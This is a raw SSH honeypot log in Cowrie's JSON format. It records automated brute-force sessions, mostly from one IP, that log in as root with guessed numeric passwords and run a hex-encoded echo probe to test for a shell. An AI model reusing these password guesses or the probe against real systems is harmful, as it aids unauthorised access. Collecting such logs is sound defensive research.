{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:43.051770Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:43.052955Z","src_ip":"212.227.125.160","session":"57f76f83646c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:47:43.241925Z","src_ip":"38.47.92.86","session":"cf1a5752a8fa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:44.047153Z","src_ip":"38.47.92.86","session":"cf1a5752a8fa"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:44.222616Z","src_ip":"38.47.92.86","session":"3d3169f7f432"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:44.239660Z","src_ip":"38.47.92.86","session":"cf1a5752a8fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36160,"dst_ip":"1.2.3.4","dst_port":22,"session":"819a68d533f7","protocol":"ssh","message":"New connection: 212.227.125.160:36160 (1.2.3.4:22) [session: 819a68d533f7]","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.261495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.262399Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.285365Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.login.success","username":"root","password":"231086","message":"login attempt [root/231086] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.358012Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:50.873674Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.874415Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.898175Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.899140Z","src_ip":"212.227.125.160","session":"819a68d533f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56390,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cabf9c6de2c","protocol":"ssh","message":"New connection: 212.227.125.160:56390 (1.2.3.4:22) [session: 3cabf9c6de2c]","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.919887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.921231Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:50.942881Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.login.success","username":"root","password":"221287","message":"login attempt [root/221287] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:51.040545Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:51.106988Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:51.107658Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:51.131135Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:51.132600Z","src_ip":"212.227.125.160","session":"3cabf9c6de2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56404,"dst_ip":"1.2.3.4","dst_port":22,"session":"a673d69a807a","protocol":"ssh","message":"New connection: 212.227.125.160:56404 (1.2.3.4:22) [session: a673d69a807a]","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.205348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.206099Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.228532Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.login.success","username":"root","password":"221189","message":"login attempt [root/221189] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.301012Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:53.363127Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.363839Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.387966Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.388982Z","src_ip":"212.227.125.160","session":"a673d69a807a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56408,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5a517882ae1","protocol":"ssh","message":"New connection: 212.227.125.160:56408 (1.2.3.4:22) [session: f5a517882ae1]","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.410104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.410961Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.436730Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.login.success","username":"root","password":"2208","message":"login attempt [root/2208] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.515717Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:53.578597Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.579331Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.603089Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.604158Z","src_ip":"212.227.125.160","session":"f5a517882ae1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56420,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e59b035c020","protocol":"ssh","message":"New connection: 212.227.125.160:56420 (1.2.3.4:22) [session: 1e59b035c020]","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.625186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.628727Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.648288Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.login.success","username":"root","password":"220688","message":"login attempt [root/220688] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.741878Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:53.804429Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.805197Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.829917Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.831059Z","src_ip":"212.227.125.160","session":"1e59b035c020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56434,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3b693b0d606","protocol":"ssh","message":"New connection: 212.227.125.160:56434 (1.2.3.4:22) [session: c3b693b0d606]","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.851681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.852528Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.875207Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.login.success","username":"root","password":"220684","message":"login attempt [root/220684] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:53.951643Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:54.013935Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.014726Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.040834Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.041883Z","src_ip":"212.227.125.160","session":"c3b693b0d606"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56438,"dst_ip":"1.2.3.4","dst_port":22,"session":"07c46267baa3","protocol":"ssh","message":"New connection: 212.227.125.160:56438 (1.2.3.4:22) [session: 07c46267baa3]","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.062539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.063322Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.085727Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.login.success","username":"root","password":"220289","message":"login attempt [root/220289] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.159106Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:54.649105Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.649763Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.679295Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:54.680255Z","src_ip":"212.227.125.160","session":"07c46267baa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56450,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c87f456ddd5","protocol":"ssh","message":"New connection: 212.227.125.160:56450 (1.2.3.4:22) [session: 3c87f456ddd5]","sensor":"my-vps","timestamp":"2025-08-28T11:47:59.861345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:59.862214Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
